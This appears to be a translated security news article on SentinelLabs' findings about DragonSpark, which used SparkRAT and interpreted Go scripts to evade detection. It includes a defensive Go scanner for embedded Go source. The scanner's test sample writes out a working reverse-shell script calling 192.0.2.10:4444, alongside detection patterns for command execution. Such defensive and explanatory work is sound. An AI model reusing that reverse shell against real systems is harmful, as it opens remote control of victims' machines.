Unknown malware terrorizes gambling companies


    Researchers at SentinelLabs report that DragonSpark, a Chinese-speaking threat group, used run-time interpretation of Go source code to evade detection while conducting espionage attacks against organizations in East Asia.

    The initial access vector is Internet-exposed MySQL database servers. The attackers gain a foothold on vulnerable MySQL and web server endpoints by deploying web shells through SQL injection, cross-site scripting, or web server vulnerabilities.

    The attackers then deploy SparkRAT, an open-source Go-based remote access tool that runs on Windows, macOS and Linux. SparkRAT supports 26 commands received from the command-and-control (C2) server, which let the operator:

    • Execute PowerShell and Windows system commands remotely;
    • Manipulate Windows features and force a shutdown, restart or suspension;
    • Download, upload or delete files;
    • Collect system and sensitive information and send it to the C2 server;
    • Capture the screen and send it to the attacker's server;
    • Move laterally within the network.

    SparkRAT communicates with the C2 server over the WebSocket protocol and can update itself automatically, so new features can be added at any time.

    In addition to SparkRAT, the attackers use the SharpToken and BadPotato tools for privilege escalation and the GotoHTTP tool to establish persistence on a compromised system.

    What sets this campaign apart is its use of Go source code interpretation (via the Yaegi interpreter) to execute Go scripts embedded in the malware binaries. This lets the attackers run code that is never compiled, which sidesteps static analysis of the compiled binary.

    The Go script is also used to open a reverse shell, to which the attackers connect with Meterpreter to execute code remotely. The method is somewhat involved but is an effective way of evading static analysis, because most security products evaluate the behavior of compiled code rather than source text embedded in a binary as data.
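    The tradecraft described above has a static signature of its own: a script handed to an interpreter such as Yaegi must exist inside the binary as plain Go source text, and a normally compiled Go program carries symbol names like "main.main" but never a literal "package main" clause followed by "import" and "func" tokens. The detector below is an added example (it is not SentinelLabs' tooling or any code from DragonSpark or SparkRAT) that pulls printable runs out of a blob the way strings(1) does, flags runs that carry the tokens of a complete Go program, and lists reverse-shell and command-execution indicators found in them. The scanned blob, including the reverse-shell script and the 192.0.2.10:4444 address inside it, is constructed for the example; the `interp.New(` indicator refers to Yaegi's interpreter constructor.

```go
package main

import (
	"fmt"
	"regexp"
	"strings"
)

// Finding records one printable run inside a scanned blob that looks like
// embedded Go source, plus the suspicious API calls seen in it.
type Finding struct {
	Offset     int      // byte offset of the run inside the scanned data
	Indicators []string // suspicious calls found in the run, in pattern order
	Snippet    string   // first line of the run, for triage
}

// ExtractPrintableRuns mimics strings(1): it returns maximal runs of
// printable ASCII (space..~ plus tab and newline) of at least minLen bytes,
// together with the offset at which each run starts.
func ExtractPrintableRuns(data []byte, minLen int) (offsets []int, runs []string) {
	start := -1
	flush := func(end int) {
		if start >= 0 && end-start >= minLen {
			offsets = append(offsets, start)
			runs = append(runs, string(data[start:end]))
		}
		start = -1
	}
	for i, b := range data {
		printable := (b >= 0x20 && b <= 0x7e) || b == '\n' || b == '\t'
		if printable {
			if start < 0 {
				start = i
			}
		} else {
			flush(i)
		}
	}
	flush(len(data))
	return offsets, runs
}

// Source-level tokens that a standalone Go program must contain. A compiled
// Go binary carries symbol names such as "main.main" and "os/exec.Command",
// but not these keywords laid out as source text.
var (
	rePackage = regexp.MustCompile(`(?m)^\s*package\s+[A-Za-z_]\w*\s*$`)
	reImport  = regexp.MustCompile(`(?m)^\s*import\s*(\(|"[^"]+")`)
	reFunc    = regexp.MustCompile(`\bfunc\s+[A-Za-z_]\w*\s*\(`)
)

// Calls that, inside an interpreted script, point at a reverse shell,
// command execution or an embedded interpreter. Illustrative, not exhaustive.
var indicatorPatterns = []*regexp.Regexp{
	regexp.MustCompile(`\bnet\.Dial\(`),
	regexp.MustCompile(`\bexec\.Command\(`),
	regexp.MustCompile(`\.Stdin\s*=\s*\w+`),
	regexp.MustCompile(`\binterp\.New\(`), // Yaegi's interpreter constructor
}

// LooksLikeGoSource reports whether a text run has the three tokens a
// complete Go program needs: a package clause, an import and a function.
func LooksLikeGoSource(s string) bool {
	return rePackage.MatchString(s) && reImport.MatchString(s) && reFunc.MatchString(s)
}

// ScanForEmbeddedGoSource scans a blob (for example a binary read from disk)
// and returns every printable run that looks like Go source text.
func ScanForEmbeddedGoSource(data []byte) []Finding {
	var findings []Finding
	offsets, runs := ExtractPrintableRuns(data, 64)
	for i, run := range runs {
		if !LooksLikeGoSource(run) {
			continue
		}
		var ind []string
		for _, p := range indicatorPatterns {
			if m := p.FindString(run); m != "" {
				ind = append(ind, m)
			}
		}
		first := strings.SplitN(strings.TrimSpace(run), "\n", 2)[0]
		findings = append(findings, Finding{Offset: offsets[i], Indicators: ind, Snippet: first})
	}
	return findings
}

// SampleBlob is a constructed stand-in for a binary: non-printable bytes
// around a benign long string (no finding) and a constructed reverse-shell
// script of the kind an embedded interpreter would be fed (one finding).
func SampleBlob() []byte {
	header := []byte{0x7f, 'E', 'L', 'F', 0x02, 0x01, 0x01, 0x00, 0x00, 0x00}
	benign := "Copyright notice: this text is long enough to be a printable run but it is not Go source code at all."
	script := "package main\n\nimport (\n\t\"net\"\n\t\"os/exec\"\n)\n\nfunc main() {\n" +
		"\tc, err := net.Dial(\"tcp\", \"192.0.2.10:4444\") // constructed address (TEST-NET-1)\n" +
		"\tif err != nil {\n\t\treturn\n\t}\n" +
		"\tcmd := exec.Command(\"/bin/sh\")\n\tcmd.Stdin = c\n\tcmd.Stdout = c\n\tcmd.Stderr = c\n\tcmd.Run()\n}\n"
	var b []byte
	b = append(b, header...)
	b = append(b, benign...)
	b = append(b, 0x00, 0x01, 0xff)
	b = append(b, script...)
	b = append(b, 0x00, 0x00)
	return b
}

func main() {
	for _, f := range ScanForEmbeddedGoSource(SampleBlob()) {
		fmt.Printf("offset %d: %q indicators=%v\n", f.Offset, f.Snippet, f.Indicators)
	}
}
```

    Run against a real file with `ScanForEmbeddedGoSource(os.ReadFile(path))`; the heuristic is deliberately loose (a Go source file shipped as an asset would also trigger it), so treat a hit as a triage lead to confirm by checking whether the binary links an interpreter package, not as a verdict.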

    All of the open-source tools used by DragonSpark were written by Chinese developers, which points to links between the group and the country. DragonSpark used compromised networks in Taiwan, Hong Kong, China and Singapore belonging to gambling companies, art galleries, travel agencies and schools.

    Author DeepWeb